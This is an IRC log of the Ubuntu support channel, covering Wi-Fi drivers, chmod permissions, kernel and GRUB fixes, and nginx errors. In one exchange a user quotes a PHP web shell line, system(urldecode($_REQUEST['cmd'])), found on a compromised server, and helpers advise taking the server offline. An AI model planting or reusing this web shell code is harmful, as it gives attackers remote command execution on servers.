(laravel), and now xsp (mono), like 4-5 ports and they all get connection refused [13:47] so these messages you encountere don beyondsecurity.com (probably generated by nessus) may not, and probably did not, take into account that these patches were backported [13:47] I have an unusual wifi issue, and wondering if anyone has seen this. My wifi will connect fine on first boot. It connects automatically at the log in screen. However, once logged in, if I want to change networks, or disconnect and reconnect to the same network, it says the password is wrong [13:48] Running 17.10, wayland/gnome (default install) [13:48] rockdarko: ^ to get a reliable idea of whether your installation is affected by these vulnerabilities, you will need to get the "CVE" identifiers provided and check those against https://people.canonical.com/~ubuntu-security/cve/ [13:49] tomreyn: wow I knew I would get some help in here but you are one fregging gem! Thanks for much! [13:49] rockdarko: :) welcome [13:49] you may also want to read https://wiki.ubuntu.com/SecurityTeam on this and similar topics [13:50] also https://wiki.ubuntu.com/SecurityTeam/FAQ [13:50] eeb: try editing the connection manually from Network Settings. choose the network you're trying to connect to, and in the Security tab enter the password manually [13:50] Found it! I uninstalled iptables, which uninstalled ufw and ubuntu-standard, that took care ofi t [13:50] then save it, and see if a reboot makes it behave correctly [13:51] I can do that, and when it reboots it connects to whichever network I have manually chosen, but the same issue persists once logged in [13:51] skinux: no need to uninstall these, you just needed to remove / replace the incorrect policy. [13:52] tomreyn: thanks again. you are so spoiling me here. [13:53] glad i could help [13:55] hello all [13:55] i would like to ask a little help [13:55] what is the correct permission for fileuploading directory?I want to prevent executing scripts [13:56] but if i try 666 thats not allow even file upload because move_upload_file php function does not work [13:56] failed to open stream: Permission denied [13:57] joopm: directories generally have +x (traverse) permission, files only rw [13:57] okey thank you [13:58] what would be good in this case? [13:59] joopm: if directories don't have +x then presumably the 'move_upload_file() cannot traverse directories to the destination [14:00] oh i see [14:01] Yndurain: but thanks for the suggestion. weird behaviour indeed [14:02] you're-- [14:02] heh [14:02] okey i set back to 777,but i am affraid that uploaded scripts will be executable [14:06] joopm: as I said, only directories need the +x, not files, +rx is sufficient for read/traverse. Do NOT set +x on files === apsknight1 is now known as apsknight [14:07] chmod xxx directoryName will set the directory permission,but whats the way to set permission of the directory files than? [14:09] joopm: "chmod -R 664 path/to/dir; chmod -R ugo+X path/to/dir" (+X only sets traverse (x) bit on the directories) [14:09] joopm: see "man chmod" for details of how the flags work [14:10] Why does firewall block localhost loopback connections by default? [14:11] skinux: there are no 'default' firewall rules; it depends on what package is used and it's defaults [14:11] Well, iptables did at laest [14:12] Is shoreline a better firewall? [14:13] skinux: no, iptables is a tool that is called when the user, admin, or some package, has defined some rues [14:14] skinux: the kernel *is* the firewall; shoreline, ufw, are just user-friendly management front-ends that have packaged sets of rules [14:14] Oh, okay. [14:14] Well, what I'd like is a GUI front-end [14:16] Can someone help me installing `perf` tool ? whenever i try to use it it throws errors like "dpkg: warning: version '4.14.12-x86_64' has bad syntax: invalid character in revision number" [14:20] Hello guys, I have a problem with apt-get: https://paste.ubuntu.com/p/5JTrnW9j3p/ Could anybody help? Thanks! [14:22] Is the Ubuntu package website 'list of files' feature known/expected to be broken? Trying to view files returns an error: https://packages.ubuntu.com/xenial/linux-image-4.13.0-37-generic [14:23] holden, Yakkety is EOL and no longer supported [14:23] holden, see !eol for more info [14:23] !eol [14:23] End-Of-Life is the time when security updates and support for an Ubuntu release stop, see https://wiki.ubuntu.com/Releases for more information. Looking to upgrade from an EOL release? See https://help.ubuntu.com/community/EOLUpgrades [14:25] sry is this channel for official ubuntu support only ? I thought this is the channel for general ubuntu chat . [14:25] garrettkajmowicz: that url works here [14:25] ericrajuin, try #ubuntu-offtopic [14:26] Okay. Well, apparently my real problem is my web browsers keep closing connection with the servers. [14:26] I'm using Opera and Firefox. [14:27] lotuspsychje: Did you click on the "list of files" at the bottom? I get "No such package in this suite on this architecture." [14:27] SlidingHorn, yes, I understand it is EOL, but I can't upgrade right now. Any solution to fix my problem for the time being? [14:28] so this is an official support channel ? [14:28] !support | ericrajuin yes [14:28] ericrajuin yes: The official ubuntu support channel is #ubuntu. Also see http://ubuntu.com/support and http://ubuntuforums.org and http://askubuntu.com [14:28] hello [14:29] garrettkajmowicz: wich ubuntu version are you on, and what are you trying to do exactly? [14:29] okay thanks [14:31] lotuspsychje: I'm on 16.04 LTS. For some reason I'm still on a 3.13 kernel. However, when I tried upgrading to a 4.x kernel I no longer had r816[89] drivers. So I was trying to figure out which kernels had the correct modules. [14:31] How do I determine exactly which version of Ubuntu I'm using? [14:32] skinux: lsb_release -a && uname -a [14:33] alguien por ahi? [14:33] !es | investigador03 [14:33] investigador03: En la mayoría de los canales de Ubuntu, se habla sólo en inglés. Si busca ayuda en español entre al canal #ubuntu-es; escriba " /join #ubuntu-es " (sin comillas) y presione intro. [14:34] garrettkajmowicz: yeah some chipset are a pain lately [14:35] lotuspsychje: Normally I'd ignore it, but the kernel 3.13 kernel has been having the NIC chipset get into funky states where I need to reboot the machine every few days. I was hoping a new kernel would improve that. [14:35] !info linux-image-generic xenial | garrettkajmowicz [14:35] garrettkajmowicz: linux-image-generic (source: linux-meta): Generic Linux kernel image. In component main, is optional. Version 4.4.0.116.122 (xenial), package size 2 kB, installed size 14 kB [14:35] garrettkajmowicz: the package-list is fine, it's just that the package is no longer in xenial-security, it's in xenial-updates. See https://packages.ubuntu.com/xenial-updates/amd64/linux-image-4.13.0-37-generic/filelist [14:37] Qu, Which App would be the best way to check my texts & SMS on bionic beaver 18.04 ? [14:37] AuroraAvenue: #ubuntu+1 for 18.04 support please [14:38] TJ-: Awesome! At least that shows that the driver isn't in that version either. But the extra modules seems to include it. Yay! Thanks, all! [14:38] lotuspsychje, thank-you. I shall try during the working week. [14:39] garrettkajmowicz: it's certainly a bug in the web-site; I'll try to get it addressed [14:40] TJ-: Cool! And no worries - I have this "special" ability to find bugs. A few months ago I found 3 bugs in the treadmill software at the fitness facility I use. [14:41] hello, what is the way to use an external usb hard disk connected over usb in artful in current year? [14:44] kus_ubuntui686: explain what you mean exactly? [14:45] I am trying to copy some files from the computer to the external hard disk but I rebooted the computer and I think gnome usually mounts the usb hard disk when I am there in person https://paste.fedoraproject.org/paste/CN51mtLeWAfFWeSOKPprWg/raw [14:46] *usually mounts it automatically to something like /media/kus/hp or something [14:46] what does ../.. mean? [14:47] dasmi_, up 2 directories from the present [14:48] SlidingHorn, can you explain me how do you understand it? I know that ./ means the current directory; what does the . before ./ and two . after ./ mean? [14:49] dasmi_, two dots is "up" - if I'm in /user/bin and I cd .. I go "up" to /usr - if I go cd ../.. I'd be in / [14:49] dasmi_, ./ is the same (i think) as . [14:50] SlidingHorn, now it makes sense to me, thanks a lot === kostkon_ is now known as kostkon === apsknight1 is now known as apsknight === Valette is now known as Guest90420 [15:14] hello [15:15] c31r2g: welcome how can we help you? [15:15] \m hello [15:15] i am new to linux [15:15] c31r2g: you joined the ubuntu support channel here [15:15] just found freenode and used google to come to this channel. [15:16] umm, thanks for the welcome. will wander around a bit to see more. [15:16] c31r2g: if you have ubuntu installed, this si the right place [15:16] hi, has anybody got experience with creating efi bootable ubuntu usb under live linux? [15:17] thanks for your time, well this is linux mint [15:17] !mint | c31r2g [15:17] c31r2g: The Ubuntu channels can only provide support for Ubuntu and its official flavors, since other distributions and derivatives have repository and software changes. So please use their dedicated support venues, for example: Linux Mint (#linuxmint-help on irc.spotchat.org), Kali Linux (#kali-linux), and LXLE (#lxle) [15:17] cool, thank you = [15:17] l exit [15:18] bobo-ubuntu: just ask? [15:18] is it possible to create bootable ubuntu in live ubuntu? [15:19] bobo-ubuntu: just write the ubuntu iso to the usb stick with dd, and run sync before removing the stick [15:20] akik, why sync b4 removing key? [15:21] to flush the copy-file buffers [15:21] bobo-ubuntu: dd comes back to the shell before writing all data to the stick [15:25] hello [15:25] i have a strange feeling because there are unknown files in my upload directoryand i am sure that it was not uploaded through my fileupload script [15:26] how can i get more infos about those files? ls -l onlyshow the creation date and a daemon user [15:27] joopm, what are you trying to learn about them? [15:27] who and how made it [15:28] 'who' is the daemon user [15:28] there is a file pw.lst and i am affraid someone tried to stole passwords [15:32] Hi everybody [15:34] joopm: it's either thator your system is being used to attack other systems using these (common) passwords [15:35] joopm: what matters is that your system got at least partially compromised, and that's the root of this problem, the one you need to solve. [15:35] also there is a php script uploaded [15:36] which contain the above code system(urldecode($_REQUEST["cmd"])); [15:36] additionally you'll need to clean up (or better reinstall, restoring files form a clean backup) this system to regain control over your server. [15:36] until both things are done, your system and the data it stores aren't safe and not under your control, and you put other systems and people at risk. [15:37] that's a classic php remote shell [15:39] the first strange file owner is mysql [15:39] so prabably all the other scripts are made by that script [15:39] and it could be created through mysql [15:40] it may be a mysql file injection then [15:40] because the upload file form add special characters to the file name [15:40] joopm: Take tomreyn's advice; that system is now toast, destroy it and re-install; only restore data files/config from a clean back up [15:41] TJ-, what should i do ? [15:41] my webserver running a php framework [15:42] joopm: if you want to investigate it further you can do so by mounting the file system from a clean linux system, such as as recovery system (if your host provides one). [15:42] but you need to shut this down now. [15:46] and in mysql database i see an unwanted table [15:46] called iojdvdd [15:46] I'm trying to debug an X issue; I've added executable commands to a file in /etc/X11/Xsession.d/ but they don't seem to be executed. Other files in that directory appear to execute commands. Command (for testing) is "/usr/bin/touch /var/log/marker". What am I missing? [15:47] joopm: continuing to investigate this now without bringing the system down is highly irresponsible, since you are probably not the only one working on this system right now. if there is any user data stored there it can get compromised any second now. [15:47] joopm, seriously...you need to take this system offline and worry about forensics later. The priority is stopping the attack [15:47] joopm: we don't need to know what is there, it's of no use to us. We've told you what you need to do. [15:47] FYI: We had this same 'mysql' issue/attack reported a week or more back. possibly from the same user, but I cannot be sure. [15:48] TJ-, please help me [15:48] !ask s10gopal [15:48] !ask | s10gopal [15:48] s10gopal: Please don't ask to ask a question, simply ask the question (all on ONE line and in the channel, so that others can read and follow it easily). If anyone knows the answer they will most likely reply. :-) See also !patience [15:48] :) [15:48] s10gopal: You've been told what needs doing; get upstream Linux devs to work on fixing it, you've got a bug reported in the Linux bugzilla [15:48] ppf, thank you...I haven't been here in a while [15:52] !ping [15:52] pong! [16:01] hye [16:01] any one here [16:01] please respond [16:02] !hi [16:04] hye [16:04] !ask | cvdd43 [16:04] cvdd43: Please don't ask to ask a question, simply ask the question (all on ONE line and in the channel, so that others can read and follow it easily). If anyone knows the answer they will most likely reply. :-) See also !patience [16:04] cvdd43: If you ask your ubuntu support question, you're more likely to get a response [16:04] why the hill are you talking with me like this [16:05] iam just saying hye where is the problem [16:05] https://bugs.launchpad.net/ubuntu/+source/linux/+bug/1745646 , the problem exists in latest kernel , but it dont happen in 4.9 and below [16:05] Launchpad bug 1745646 in linux (Ubuntu) "Battery drains when laptop is off (shutdown)" [Medium,New] === r0Oter is now known as r00ter [16:14] !ping [16:14] pong! [16:15] hi === zeus is now known as Guest34818 [16:16] does 1>&2 display the output to stderr [16:17] Guest34818, Get rid of the 1 [16:18] for example if [ "$3" -n] && >&2 echo "error" [16:24] Guest34818: that is wrong in many ways ... ' [ -n "$3" ] && echo "error" >&2 ' or ' if [ -n "$3" ]; then echo "error" >&2; fi ' [16:24] nooo [16:32] after giving all details asked , status is needed to changed in bugzilla ? [16:34] s10gopal, if it's an upstream bug, there's really nothing anyone here can do about it [16:36] SlidingHorn, please tell me what status i should i choose ? [16:37] The status should probably only be changed by the developers investigating it [16:38] ok thx [16:43] Hello everyone. I have a weird bug on a hp 701eg netbook. I have updated lubuntu from 17.4 to 17.10 yesterday and since then only the taskbar works. I can see the taskabr then the background is the lat thing that the tty had while booting. basically nothing else really works. If I open the terminal with ctrl+alt+t it is shown on the taskbar but doesn't really open. What can I do? [16:47] alphawarrior: nvidia graphic's ? in 17.10 which desktop environment ? [16:47] well it has the default intel graphics and it's the original lubuntu desktop [16:49] alphawarrior: what returns ' echo $XDG_SESSION_TYPE ' ? === rafael is now known as Guest23658 [16:50] alphawarrior: ( key combo ctl+alt+F2 at the login screen ) . [16:50] yeah I know please wait I have to start it [16:52] to me it seems like a driver issue: everytime i click on the desktop (which doesn't work) a rainbovy line appears and grows bigger on the top [16:53] there is no XDG_SESSION_TYPE set only XDG_VTNR, XDG_SESSION_ID, XDG_DATA_DIR, XDG_SEAT and XDG_RUNTIME_DIR [16:53] alphawarrior: maybe . pastebin ' sudo lshw -C display ' . See if the driver is loaded . [16:54] !patience [16:54] Don't feel ignored and repeat your question quickly; if nobody knows your answer, nobody will answer you. While you wait, try searching https://help.ubuntu.com or https://ubuntuforums.org or https://askubuntu.com/ [16:58] https://drive.google.com/file/d/1QUxHCNS7JY4DK7DctUcbpDpc3Pm1wzDw/view?usp=sharing sorry but I can't upload a paste as I can't start a browser. btw I had to tick the "install additional drivers" in the installer when I was installing otherwise the display resolution wouldn't work === RaptorJesus is now known as McGriddlest [17:07] !pastebinit | alphawarrior [17:07] alphawarrior: pastebinit is the command-line equivalent of !pastebin - Command output, or other text can be redirected to pastebinit, which then reports an URL containing the output - To use pastebinit, install the « pastebinit » package from a package manager - Simple usage: command | pastebinit [17:07] alphawarrior, that intel chip (945) carries a bug, iirc [17:08] Well the graphics driver crashes on lid close... [17:08] https://bugs.launchpad.net/ubuntu/+source/linux/+bug/1724639 [17:08] Launchpad bug 1724639 in openSUSE "Bug in Kernel 4.13 : Intel Mobile Graphics 945 shows 80 % black screen" [Critical,Confirmed] [17:09] oh so it's a kernel bug [17:09] alphawarrior: O pass this off to ioria -- I have no experience with dual Intel graphic's sets . No driver is loaded for that 2nd card . [17:09] can I somehow return to the 17.04 kernel which at least worked? [17:10] alphawarrior, that's it: or an old kernel (bad) or nomodeset [17:10] nomodeset? kernel cmdline argument? [17:11] alphawarrior, yup or GRUB_GFXPAYLOAD_LINUX=text [17:11] let me test that [17:13] to which grub config file should I add that to? [17:14] alphawarrior, /etc/default/grub and run sudo update-grub [17:14] thanks === McGriddlest is now known as RaptorJesus === HappyHotDog is now known as HungoverHotDog [17:17] alphawarrior: have you tried creating a new user account and testing whether it's GUI works? If it does it means there's some setting stored in the regular user account tripping the DE up [17:17] ioria: Thanks the GRUB_GFXPAYLOAD=text setting did fix it!! [17:18] alphawarrior, lucky guy [17:18] oh why? are these drivers broken? [17:18] alphawarrior, only that chip [17:19] *for [17:19] oh I see [17:19] well the intel driver also crashes randomly on my i5-2520m cpu and on an other laptop too when i close the lid. [17:20] I mean when it goes to sleep [17:21] alphawarrior, fully updated on that machine ? [17:21] well those run the LTS release sadly not the pure ubuntu... [17:24] alphawarrior, 'pure ubuntu ' meaning you install something ouside repos or a derivative ? [17:25] elementary... [17:25] ah, i see [17:25] I have lots of data that I can't move away so I can't change back to normal ubuntu + elementary desktop [17:26] alphawarrior, yes it's not even in the off repos so you 'll still need a ppa for patheon [17:32] yeah and also I1ve heard it needs xenial [17:34] nope, afaik [17:35] stable for trusty and xenial, daily for 17.10 === francisco is now known as Guest4858 [18:27] Hi, I'm on a mainline kernel from the ubuntu kernel-ppa for hardware support reasons [18:28] there's no associated linux-tools package? Am I out of luck if i want perf, etc? [18:43] icee: which PPA exactly? [18:46] HYE === FrankF1 is now known as FrankF [18:57] I need help with this error. The nginx channel said it's not about the server [info] 23903#23903: *516 shutdown() failed (107: Transport endpoint is not connected) while sending to client [18:59] skinux: unless you'll provide more context you won't make much progress here either, i'm afraid. [19:01] Trying to access my website on localhost, i get WSOD, and nginx error log provides this: https://gist.github.com/skinuxgeek/6aeb52d24fb63efd4bd17f8502bed8ea [19:05] skinux: are you saying your ubuntu system freezes with a white screen when you access your locally installed webserver using the http protocol? using a web browser? [19:05] which ubuntu release is this? [19:06] tomreyn: this is a long running self-inflicted web-site that fails to send content to browser resulting in an empty page [19:07] looks like fpm is involved too [19:07] so WSoD refer to the web page coming out empty? [19:07] certanily a redirect to another daemon [19:07] *referS [19:08] sounds to me like a websocket connection was closed premuturely on the browser/Javascript side [19:09] not really an ubuntu problem though [19:09] unless the ubuntu client freezes while it happens, no. [19:09] looks like the webserver either has duff content, or the redirect to whatever is running on port 9000 isn't completing the request to send an "ok" back to localhost on 80 [19:09] tomreyn: that's not freezing [19:09] (look at the logs) [19:10] ikonia: these are web server logs, they don't say what the client does. skinux said "i get WSOD", i assume "i" refers to the requesting client. [19:11] tomreyn: there is no such thing as a white screen of death [19:11] he's getting a white page as the content isn't rednding [19:11] rendering [19:11] The term "WSoD", or the way i know it, would refer to an OS fgreezing displaying just a white screen. [19:11] which is common for the php wordpress app he's running [19:11] oh ok, just a bad explanation then [19:11] it's a browser white screen not the desktop [19:11] it is a bad explanation [19:11] you're probably right [19:12] if the OS was freezing the web server logs would be incomplete [19:12] they are complete and showing the error [19:12] Notice the"upstream: "fastcgi://127.0.0.1:9000"" infers a proxied connection also [19:12] should probbaly used sockets if localhost [19:12] the port 9000 problem not responding with "ok" to port 80 I was referencing earlier [19:12] *use [19:12] it can't [19:13] This has been a repeated issue from skinux over several weeks with some customised config involving nginx and lack of experience [19:13] why not? [19:13] based on those logs it's wordpress using fpm [19:13] TJ-: based on the scroll back in my logs, it looks like skinux is following some duff tutorial [19:14] right, you can run wordpress or any php scripts fine using nginx + fpm where nginx talks to fpm via sockets. [19:14] tomreyn: the wp-cron doesn't work with sockets I believe [19:14] not all the functions respond to sockets [19:14] (but I'm working from memory to be honest) [19:15] okay, i'm not into the details [19:15] anyways, since skinux just put the question here and then ran itÄs hardly worth spending more time on it. ;) [19:15] *it's [19:15] got to have something to keep our minds busy :p [19:16] sup peeps [19:16] skinux: have you followed a guide to set this up ? [19:19] anyone help with a guide on wireless drivers? having issues getting one working. from what i can tell, as of january, support for a realtek c822 isnt available in ubuntu. its a relatively new comp. trying to install a netgear AC622. according to lsusb its there. i installed the driver. im guessing my issue is in blacklisting a default driver but i'm not sure hoe to do it [19:19] *how [19:21] TJ-: heh not from a ppa, from kernel-ppa http://kernel.ubuntu.com/~kernel-ppa/mainline/v4.15.13/ [19:23] or not :/ [19:23] icee: I'm pretty sure there was/is another location with the linux-tools ... but I may be mis-remembering and built them myself [19:24] xEth0sx is that USB? [19:24] yes -usb. [19:24] the onboard card isnt showing an available driver [19:24] xEth0sx in terminal> lsusb | nc termbin.com 9999 [19:25] what's the device id, xEth0sx [19:25] its the realtek c822 [19:25] one sec ill get it [19:25] xEth0sx: you can identify an in-use driver (if any) with "ls -ld /sys/class/net/*/device/driver" [19:25] us 001 Device 002: ID 0846:9052 NetGear, Inc. A6100 AC600 DB Wireless Adapter [Realtek RTL8811AU [19:26] rtl8811au is the driver i installed for it [19:26] xEth0sx: if I recall correctly the -AU driver is from a github repo, I did some hacking on it last year [19:26] xEth0sx, jeremy31 asked you lsusb | nc termbin.com 9999 , btw [19:26] xEth0sx: ahh yes, I have it installed as a DKMS package rtl8812au_8821au-4.3.14.github.abperiasamy [19:27] k gimme a sec let me get the machine up. i'm on my desktop ill log on to it so i can post from it. brb [19:28] win 8 [19:28] oops [19:28] https://github.com/abperiasamy/rtl8812AU_8821AU_linux [19:29] tomreyn: right, that's the one : remote.origin.url=https://github.com/abperiasamy/rtl8812AU_8821AU_linux.git [19:30] check insights -> network on github, there are alternatives [19:30] tomreyn: did we ever hear back from the person with the RAID+RAID1+LVM on-32-bit issue? [19:30] TJ-: yes, he responded earlier today saying it went well thanks to our instructions. [19:31] this abperisasamy has generally been the prime mover for the best support [19:31] tomreyn: oh, great! That was a fun investigation, although drawn-out! [19:31] it was like taking layers of wrappings off a birthday present :) [19:31] tomreyn: I eventually got 64 bit Ubuntu onto that machine... went back into the logs and did each step you and TJ- told me. It worked PERFECTLY and all the data seems to be intact as well. [19:31] xEth0sx see https://gist.github.com/jeremyb31/e08fe3f177eea0cb623d0f9c4f554339 for commands [19:32] hehe indeed TJ-, much fun. [19:32] tomreyn: especially when it's someone else's data! [19:32] :) [19:36] k i'm back [19:37] anyone know if i can get the on board realtek card running? [19:37] xEth0s2x in terminal> lspci -nnk | grep -iA3 net | nc termbin.com 9999 [19:38] Are you using the code from : remote.origin.url=https://github.com/abperiasamy/rtl8812AU_8821AU_linux.git [19:38] xEth0s2x post the URL [19:38] kk [19:39] http://termbin.com/enk3 [19:40] tj- when i installed the driver for the netgear i installed from the gui under software updater. not sure where it got the code [19:41] either card is fine (usb card or the onboard. i'd rather have the onboard working obv but, i'll take what i can get. [19:42] xEth0s2x: ok, which release of Ubuntu is it, and what does this report "uname -r" ? [19:42] 17.10 [19:42] 4.13.0-37-generic [19:43] xEth0s2x: the correct driver for that internal PCI device is: /lib/modules/4.15.0-12-generic/modules.alias:20015:alias pci:v000010ECd0000B822sv*sd*bc*sc*i* r8822be [19:43] TJ-, 4.15 ? [19:43] xEth0s2x see https://gist.github.com/jeremyb31/8687eec6ea7f9dca9e71a24aab197f0e [19:43] alright, tyvm. can i apt-get install for it? [19:44] xEth0s2x you can add support using Larry Finger's github rtlwifi-new extended branch [19:44] xEth0s2x: that modules (r8822be) isn't in the 4.13 kernel but it is in the 4.15 kernel which we have in 18.04 Bionic. On 16.04 there's a package to install the 4.15 kernel, but I don't think there's a similar package in 17.10 to pull in the 18.04 kernel [19:45] xEth0s2x: the preference would be to install an Ubuntu-packaged kernel that supports the device [19:45] sucks to be a linux newb lol [19:45] xEth0sx, please, can you paste ubuntu-drivers list output [19:46] yes i can one sec [19:47] xEth0s2x: one option might be to do an early release-upgrade from 17.10 to 18.04, which is due for release at the end of April. That'd bring in the 4.15 kernel. [19:47] rtl8812au-dkms [19:47] didn't know ubuntu got realtek proprietary drivers [19:47] rtl8812au-dkms is an Ubuntu package with dkms faults [19:48] tj- i can try that. i saw the betas were out [19:48] xEth0s2x or run the commands at https://gist.github.com/jeremyb31/8687eec6ea7f9dca9e71a24aab197f0e [19:48] k i'm on it [19:50] ty guys btw [19:51] k build essential installing. running through my phone for internet so a bit slow lol [19:52] jeremy31: but the rtl8812au is for USB device not PCI [19:53] xEth0s2x: the rtl8812au-dkms will drive the USB device but not te built-in PCI device (which is the 8812be) [19:53] TJ they might have that listed for the USB [19:53] jeremy31: correct [19:53] TJ the github is a better choice for the USB as the dkms works [19:53] xEth0s2x: for the 8812be an upgrade to 18.04 Bionic would give you the 4.15 linux kernel that supports the PCI device [19:54] jeremy31: yes, I know, I've been hacking on that code for a long time :) [19:55] TJ why is it not fixed? I posted a comment with the fix on a rtl8812au-dkms bug report [19:55] jeremy31: I have no idea! I've raised the issue many times, but as with many things Canonical, they love the shiny new but can't be bothered with following up [19:57] the comp having the issues is my kids laptop i felt bad lol. 15 years old and i talked him into trying linux. then i broke it lol [19:58] i've had no problems at all with ubuntu on my comp [19:58] xEth0s2x You also posted on ubuntuforums.org? [19:58] yes i did [19:58] couple days ago got no response [19:59] jeremy- install completed [19:59] xEth0s2x One reply from praseodym an hour ago. I am a moderator there. You can reboot it [19:59] what do i need to do next? [19:59] kk [19:59] brb === lubuntu is now known as Guest44893 [20:03] Hi Everyone...Im trying to install hostapd but it won't find the package. I was searching for the ppa but couldn't find it. Can you please help [20:04] should have just done modprobe, or re-plugged the USB device! [20:05] still showing no wireless card detected [20:05] "no wifi adapter found" under settings i mean [20:06] xEth0s2x Is secure boot disabled in UEFI/BIOS? try> sudo modprobe rtl8822be [20:06] secure boot should be disabled [20:07] modprobe is giving me the required key not available error like secure boot is enabled lol [20:08] xEth0s2x That would be a big sign that it is enabled yet [20:08] ikr lol [20:08] Does NVIDIA sign it's drivers with a sha256 hash these days. I seem to have secure boot disabled, but I have a feeling this is no longer necessary. [20:08] disabled it on install [20:09] k ill try diabling it again [20:09] xEth0s3x see what this says> mokutil --sb-state [20:09] is there any way to get netplan to use point-to-point routing ? it's required by my host [20:10] Hey everyone. I am trying to boot my pc but i only get a black screen after bios. Not even grub. Any ideas? [20:14] IsFunny: Does tapping Esc key whilst GRUB is starting display it's menu? [20:23] hi i need help finding a speech command via microphone app for linux [20:30] xEth0s2x I already replied to your forum post [20:30] kk [20:31] ohh [20:32] xEth0s2x The rtl8812au-dkms doesn't support your USB device, I would> sudo apt-get purge rtl8812au-dkms [20:32] kk [20:32] i installed pastebinit [20:32] or ran whichever [20:32] xEth0s2x Do you still have the gist links I posted earlier? [20:33] not sure the proper way on posting to the forums though [20:33] jeremy- lost when i rebooted [20:33] xEth0s2x Post the info I asked for on the post, we can go from there [20:34] kk bud ty [20:34] found how to add the code tags [20:35] xEth0s2x https://gist.github.com/jeremyb31/e08fe3f177eea0cb623d0f9c4f554339 and https://gist.github.com/jeremyb31/8687eec6ea7f9dca9e71a24aab197f0e [20:35] for the rtl8812au driver you can add the vendor:product IDs to it if it doesn't have them already [20:36] jeremy- mokutil state shows secure boot enabled [20:39] xEth0s2x That has to be changed in BIOS/UEFI so the drivers can load, otherwise only TJ's idea of switching to the 4.15 kernel will work for the internal wifi [20:40] kk. whichever is fine for me. gimme a min. [20:40] id be up for uograding to 18.04 on my comp if its possible before release [20:41] xEth0s2x try in terminal> sudo update-secureboot-policy [20:41] see if that allows you to disable, I think I used it once [20:44] xEth0s2x, I'm running 18.04 in a virtual machine and it seems to work fine now. As a general rule it is better to wait to i'ts out of beta. Better still to wait to July when a .1 bug patch seems to surface. [20:45] a "point release" [20:45] xEth0s2x https://wiki.manjaro.org/index.php?title=UEFI_-_Disable_Secure_Boot might help [20:45] jeremy31, will fuck up bitlocker if he's dual booting [20:52] If they could just get Secure Boot disabled the wifi would work [20:55] looking for the option in bios settings to disable secure boot not finding it [20:56] xEth0sx Likely in a somewhat hidden boot option or security menu [20:56] kk [20:57] found it [20:58] xEth0sx awesome [20:59] k what was that modprobe command u gave me earlier [21:00] the name of the driver i mean [21:00] lol [21:00] xEth0sx It should load > sudo modprobe -v rtl8822be [21:01] rtl8812be nlt found in directory [21:01] *not [21:01] rtl8822be [21:01] oops [21:02] rebooting [21:03] dude ty it worked [21:04] xEth0sx Hope your kid likes it [21:04] me too hoping im making a future comp nerd lol [21:05] had so many issues with win 10 whough it sucked [21:05] I only use Win 10 at work, I don't really like it [21:05] i wiped it from my comp within 4 hours of buying the machine lol [21:06] i'm aspiring to work my way into a linux job. gonna take some stufy time though still such a newb [21:06] *study [21:06] xEth0sx Win 8 didn't last that long on this Lenovo [21:06] jeremy31, If you do things like mechanical CAD there isn't much choice. There is VariCAD and that's about it. [21:07] Otherwise desktop software for Linux is mostly on par with windows. [21:07] there way to go head and upgrade this one to 18.04? [21:08] Hello [21:08] hi [21:08] hola [21:08] howdy [21:10] where are you guys from? :-) [21:10] from my home [21:10] hey, me too [21:10] oklahoma, usa [21:10] :D [21:10] Are you sure we are all guys? [21:11] Me from India :-) [21:11] geez what a sausage fest ;) [21:11] !ot | veeru [21:11] veeru: #ubuntu is the Ubuntu support channel, for all Ubuntu-related support questions. Please register with NickServ (see /msg ubottu !register) and use #ubuntu-offtopic for other topics (though our !guidelines apply there too). Thanks! === gr33n7007h is now known as al2o3-cr [21:16] xEth0sx I added some to the forum post so that it is complete [21:29] Actually, I'm not following any tutorial,. I received help from those in #nginx, but it's outside of their scope now. === mayday is now known as Guest76759 [21:41] greetings ubuntu channel [21:42] does anyone offer support, its more of a question about 18.04? [21:42] hello [21:42] do daemons write logs using system locale? [21:43] I think I am in the wrong channel [21:43] by default, I mean [21:43] monery: #ubuntu+1 please [21:43] I noticed after /topic, thx lotuspsychje [22:07] Hello world [22:13] hello guys... i have a problem with two USB devices. They keep switching doors every time i reboot, sometimes ttyACM1 and sometimes ttyACM0, my application goes crazy... [22:13] have any way to leave these ports default by some hardware ID? Thanks [22:13] 16.04 :) [22:14] cako: yes, look into udev rules [22:19] cako: easiest is an additional /etc/udev/rules.d/my-ttyACMs.rule that creates dedicated symlinks for each device of the form /dev/ttyMyACM1 pointing to the /dev/ttyACM? node that is being generated by the kernel. Make the rule match on the unique attributes of each device such as a MAC address or serial number, so your symlinks are always for the correct device even when the kernel node names change === mudo_ is now known as mudo [22:22] I have an interesting issue. I have a lenovo "Thinkpad" yoga 11e 3rd Gen (never again), integrated intel graphics, 4gz ram. I can install 14.04 just fine, but 16.04 or above, I get an issue with both the keyboard and touchpad not working at all. It seems to be stuck in some tabet mode or something because the touchscreen works, but then it bugs out when I try to type or use the mouse. Everything works on Windows and on 14.04 though, [22:22] These issues occur after install and when I'm running the live iso [22:23] thx leftyfb TJ- [22:35] is it possible to install a previous version of chromium package? [22:35] I'm trying to install chromium version 64.0.3282.140-0ubuntu0.16.04.1 [22:39] bencc: downgrade isnt possible mate [22:39] bencc: whats wrong with your chromium? [22:40] Is there any way to get CFIS to behave properly with Windows permissions? CFIS doesn't seem to be aware of Windows permissions at all [22:41] lotuspsychje: there is a bug in chromium 65. not sure we need to go to specifics [22:41] lotuspsychje: why can't I uninstall 65 and install 64? [22:48] bencc: we reccomend using package versions for your ubuntu version [22:48] bencc: or try !backports or snaps [22:51] !backports [22:51] If new updated Ubuntu packages are built for an application, then they may go into Ubuntu Backports. See https://help.ubuntu.com/community/UbuntuBackports - See also !packaging [22:51] !packaging [22:51] The packaging guide is at http://packaging.ubuntu.com/html/ - See https://wiki.ubuntu.com/UbuntuDevelopment/NewPackages for information on getting a package integrated into Ubuntu - Other developer resources are at https://wiki.ubuntu.com/UbuntuDevelopment - See also !backports and !sponsoring [22:52] lotuspsychje: chromium 64 was the stable package few days ago. Chromium 65 is missing h264 in webrtc [22:52] lotuspsychje: that's why I'm trying to install chromium 64 [22:52] lotuspsychje: do you want to see the bug? [22:53] bencc: you can download/install the .deb files manually from the LP build server, e.g. https://launchpad.net/~canonical-chromium-builds/+archive/ubuntu/stage/+build/14304844 [22:54] bencc: the list of published packages itself starts at https://launchpad.net/ubuntu/+source/chromium-browser/+publishinghistory [22:54] I'll try it thanks [22:57] I'll probably have a problem with chromium webdriver too [23:02] what language do daemons wrute their logs in? [23:02] write* [23:05] wewlad, if i understand your question; the language is whatever the coder used. logs aren't usually big in words, but figures/abbreviations that often don't match with any language [23:05] guiverc: don't daemons respect system locale? [23:07] 